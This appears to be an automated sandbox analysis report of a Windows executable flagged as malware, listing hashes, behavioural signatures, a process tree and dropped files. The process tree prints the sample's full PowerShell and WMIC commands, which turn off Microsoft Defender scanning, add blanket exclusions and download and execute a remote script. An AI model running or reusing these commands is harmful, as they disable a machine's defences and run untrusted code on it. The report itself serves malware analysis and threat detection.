Analysis

  • max time kernel: 121s
  • max time network: 125s
  • platform: windows7_x64
  • resource: win7-20240903-en
  • resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted: 16-10-2024 12:07

General

  • Target: 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
  • Size: 50.9MB
  • MD5: 5bfa176d4d484262d8762d97bcd2b784
  • SHA1: 7f09db1fa2d3f0d4f73621516eabd95f9175de96
  • SHA256: 54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6
  • SHA512: 93b76a827932ca934b9a76afa0347e7f3e63ba4e09a240b29604edde0903802bd27646e840858374b77f74d9b3fabcca8767f1ab949cd0a0abbb627e4a9b1675
  • SSDEEP: 1572864:95vrmbfVqelXwwPAo8DzC7XhPDLbg5QOApSqugmBRYW6Q/:fI9XwKAoqOsaUNBsQ/

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
    ps1.dropper: https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Invoke Powershell command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2100
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c install.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Users\Admin\AppData\Local\Temp\install.exe
        install.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSIF6FC.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2552
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3028
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding A3DB54298C273249030CB771A4DC86AD C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:616

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\MSIF6FC.tmp
    Filesize: 36.6MB
    MD5: 6d9b5a3b75da266db5c237b0ac70b7f9
    SHA1: 9ce4aa208974b299ce0abeaf043740616f4f0b02
    SHA256: d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b
    SHA512: fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

  • C:\Users\Admin\AppData\Local\Temp\install.exe
    Filesize: 36.6MB
    MD5: 979ce82b2ea35a92fae6a60c6c3e3791
    SHA1: 8d260eea0151ee7a6aae88eb2e9015d5efb2603b
    SHA256: be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca
    SHA512: ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: 186f3b27fdc3ff6d33d9231174d28082
    SHA1: 1a832d9159f74e3c838f487ca7c58227ffe2acdd
    SHA256: 60331954e6070f03e5c0ce799bee78e0c0830d8a0a97acd81ef46d13fd64e92c
    SHA512: cb36cbe91737ca5b04b56ced61dd01e1af3df7bb236564871c37d9c253f666bc7d5e04a6e55f066ab0bc471bd189536f370a9c36d3046de281b048596d29b98a

  • \Users\Admin\AppData\Local\Temp\MSIF92E.tmp
    Filesize: 298KB
    MD5: 684f2d21637cb5835172edad55b6a8d9
    SHA1: 5eac3b8d0733aa11543248b769d7c30d2c53fcdb
    SHA256: da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
    SHA512: 7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

  • memory/1928-1-0x0000000000CC0000-0x0000000004438000-memory.dmp
    Filesize: 55.5MB

  • memory/1928-32-0x0000000000CC0000-0x0000000004438000-memory.dmp
    Filesize: 55.5MB

  • memory/1928-33-0x0000000000CC0000-0x0000000004438000-memory.dmp
    Filesize: 55.5MB

  • memory/2100-11-0x000000001B720000-0x000000001BA02000-memory.dmp
    Filesize: 2.9MB

  • memory/2100-12-0x0000000002390000-0x0000000002398000-memory.dmp
    Filesize: 32KB